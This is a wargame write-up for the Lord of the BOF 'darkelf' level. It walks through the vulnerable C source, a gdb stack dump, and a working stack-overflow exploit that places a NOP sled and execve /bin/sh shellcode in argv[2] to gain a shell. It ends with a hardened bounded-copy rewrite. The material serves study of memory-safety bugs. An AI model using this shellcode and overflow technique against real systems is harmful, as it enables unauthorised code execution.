Looking at the source:
[wolfman@localhost wolfman]$ cat darkelf.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - darkelf
        - egghunter + buffer hunter + check length of argv[1]
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen, strcpy, memset */

extern char **environ;

int main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // egghunter: wipe every environment string so nothing can be staged there
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        // the byte that lands in the return address must start with 0xbf (stack)
        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // check the length of argument (48 bytes still overruns the 40-byte buffer)
        if(strlen(argv[1]) > 48){
                printf("argument is too long!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer hunter: clear the buffer after use
        memset(buffer, 0, 40);
        return 0;
}
Something gets added to the source at every level. This time, if the second argument (argv[1]) is longer than 48 bytes, the program bails out before the copy, so anything past that point is discarded.
So the level is solved by using the third argument (argv[2]) as well.
Looking at the flow:
|buffer [ 40 ] | SFP | RETN |
This is the layout, so the payload we build looks like:
| NOP 44 | RETN | NOP 200 | shellcode |
The important point here is that
NOP 44 through RETN go into the second argument, and NOP 200 through the shellcode are split off into the third argument
(perl is used twice, with a space in between).
And this time I found the address to put in the RETN slot of the payload by debugging, and entered it by hand.
[wolfman@localhost /tmp]$ gdb -q darkelf
(gdb) b main
Breakpoint 1 at 0x8048506
(gdb) r $(perl -e 'print "\x90"x44,"AAA\xbf"') $(perl -e 'print "\x90"x200,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"')
Starting program: /tmp/darkelf $(perl -e 'print "\x90"x44,"AAA\xbf"') $(perl -e 'print "\x90"x200,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"')
(gdb) x/500x $esp
0xbffff8dc: 0x40021ca0 0xbffff908 0x4000a970 0x400f855b
0xbffff8ec: 0x080496ec 0x4000ae60 0xbffff954 0xbffff908
0xbffff8fc: 0x080484eb 0x080496d8 0x080496ec 0xbffff928
0xbffff90c: 0x400309cb 0x00000003 0xbffff954 0xbffff964
0xbffff91c: 0x40013868 0x00000003 0x08048450 0x00000000
0xbffff92c: 0x08048471 0x08048500 0x00000003 0xbffff954
0xbffff93c: 0x08048390 0x0804865c 0x4000ae60 0xbffff94c
0xbffff94c: 0x40013e90 0x00000003 0xbffffa5f 0xbffffa6c
0xbffff95c: 0xbffffa9d 0x00000000 0xbffffb7e 0xbffffb87
0xbffff96c: 0xbffffb9f 0xbffffbbe 0xbffffbe0 0xbffffcca
0xbffff97c: 0xbffffcd7 0xbffffe9a 0xbffffeb9 0xbffffed6
0xbffff98c: 0xbffffeeb 0xbfffff0a 0xbfffff15 0xbfffff2e
0xbffff99c: 0xbfffff3e 0xbfffff46 0xbfffff57 0xbfffff61
0xbffff9ac: 0xbfffff6f 0xbfffff80 0xbfffff8e 0xbfffff99
0xbffff9bc: 0xbfffffac 0x00000000 0x00000003 0x08048034
0xbffff9cc: 0x00000004 0x00000020 0x00000005 0x00000006
0xbffff9dc: 0x00000006 0x00001000 0x00000007 0x40000000
0xbffff9ec: 0x00000008 0x00000000 0x00000009 0x08048450
0xbffff9fc: 0x0000000b 0x000001f9 0x0000000c 0x000001f9
0xbffffa0c: 0x0000000d 0x000001f9 0x0000000e 0x000001f9
0xbffffa1c: 0x00000010 0x0fabfbff 0x0000000f 0xbffffa5a
0xbffffa2c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa3c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa4c: 0x00000000 0x00000000 0x00000000 0x36690000
0xbffffa5c: 0x2f003638 0x2f706d74 0x6b726164 0x00666c65
0xbffffa6c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffa7c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffa8c: 0x90909090 0x90909090 0x90909090 0xbf414141   // the sled continues from here on
0xbffffa9c: 0x90909000 0x90909090 0x90909090 0x90909090
0xbffffaac: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffabc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffacc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffadc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffaec: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffafc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb0c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb1c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb2c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb3c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb4c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb5c: 0x90909090 0x90909090 0x50c03190 0x732f2f68
0xbffffb6c: 0x622f6868 0xe3896e69 0xe1895350 0xcd0bb099
0xbffffb7c: 0x57500080 0x742f3d44 0x5200706d 0x544f4d45
0xbffffb8c: 0x534f4845 0x39313d54 0x36312e32 0x32372e38
0xbffffb9c: 0x4800312e 0x4e54534f 0x3d454d41 0x61636f6c
0xbffffbac: 0x736f686c 0x6f6c2e74 0x646c6163 0x69616d6f
---Type <return> to continue, or q <return> to quit---
Since the NOP sled keeps going after the part I marked (the annotated line above), picking any address in that region and plugging it in gives:
[wolfman@localhost wolfman]$ ./darkelf `perl -e 'print "\x90"x44,"\xbc\xfa\xff\xbf"'` `perl -e 'print"\x90"x200,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
????????????????????????????????????????????술
bash$ my-pass
euid = 506
kernel crashed
The shell pops.
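The reason the new length check does not save darkelf is visible in the source above: it caps argv[1] at 48 bytes while buffer holds only 40, so the 8 bytes of SFP and RETN are still overwritten, and the dump shows argv[2] sitting right after argv[1] on the stack, so the sled and shellcode do not need to fit in argv[1] at all. Below is an added example (not part of the original level or this post) that puts the original check beside a bounded copy whose limit comes from the destination size; the names darkelf_length_check_accepts and copy_arg_checked are my own.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 40

/* The original darkelf check: it only rejects arguments longer than 48
   bytes, so 48 bytes still flow into a 40-byte buffer (8 bytes past the
   end, exactly SFP + RET). Returns 1 if the argument would be accepted. */
int darkelf_length_check_accepts(const char *arg)
{
    return strlen(arg) <= 48;
}

/* Hardened replacement (hypothetical name): the bound is the destination
   size and the terminating NUL is counted. Returns 0 on success, -1 if
   the argument does not fit; dst is left untouched on failure. */
int copy_arg_checked(char *dst, size_t dstlen, const char *src)
{
    size_t n = strlen(src);
    if (n >= dstlen)
        return -1;          /* a 40-byte buffer holds 39 chars + NUL */
    memcpy(dst, src, n + 1);
    return 0;
}

int main(int argc, char *argv[])
{
    char buffer[BUF_SIZE];

    if (argc < 2) {
        printf("argv error\n");
        return 1;
    }
    if (copy_arg_checked(buffer, sizeof buffer, argv[1]) != 0) {
        printf("argument is too long!\n");
        return 1;
    }
    printf("%s\n", buffer);
    memset(buffer, 0, sizeof buffer);
    return 0;
}
```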